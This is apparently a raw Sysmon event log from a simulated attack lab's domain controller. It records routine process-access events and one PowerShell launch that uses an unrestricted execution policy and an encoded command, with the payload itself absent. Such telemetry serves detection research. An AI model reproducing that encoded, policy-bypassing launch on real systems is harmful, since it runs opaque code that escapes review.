11:59:58.856{266CAFBE-643E-6064-CE02-00000000AD01}21644624C:\Windows\system32\conhost.exe{266CAFBE-643E-6064-D102-00000000AD01}1604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000408Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.856{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000407Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.856{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000406Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.856{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000405Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.856{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000404Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.856{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000403Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.856{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000402Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.856{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000401Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.856{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000400Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.856{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000399Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.856{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-643E-6064-D102-00000000AD01}1604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000398Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.856{266CAFBE-643E-6064-D002-00000000AD01}33204944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-643E-6064-D102-00000000AD01}1604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e7abfff3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f4347c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f430b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e7a0b3b5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f00029(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233a
a52080857\System.Management.Automation.ni.dll+e6f63a9b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f45aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f45aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f4593b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f3665b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f43b9d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f4376a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f4347c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f430b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e7a0b3b5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f28362(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e6f278d4(wow64) 154100x8000000000000000397Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.862{266CAFBE-643E-6064-D102-00000000AD01}1604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 
(rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-643E-6064-F4EC-110000000000}0x11ecf40HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-643E-6064-D002-00000000AD01}3320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 10341000x8000000000000000396Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.794{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-643E-6064-D002-00000000AD01}3320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000395Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.794{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-643E-6064-D002-00000000AD01}3320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x8000000000000000394Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 11:59:58.778{266CAFBE-643E-6064-D002-00000000AD01}3320\PSHost.132616655987129695.3320.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000393Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.763{266CAFBE-643E-6064-D002-00000000AD01}3320ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_e3mbgjfw.wdc.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000392Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.763{266CAFBE-643E-6064-D002-00000000AD01}3320ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_xsgpycag.qye.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000391Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.747{266CAFBE-643E-6064-D002-00000000AD01}3320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_xsgpycag.qye.ps12021-03-31 11:59:58.747 10341000x8000000000000000390Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.731{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-643E-6064-D002-00000000AD01}3320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000389Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.716{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000388Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.716{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000387Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.716{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x8000000000000000386Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-643E-6064-CE02-00000000AD01}21644624C:\Windows\system32\conhost.exe{266CAFBE-643E-6064-D002-00000000AD01}3320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000385Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000384Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:58.700{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000383Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 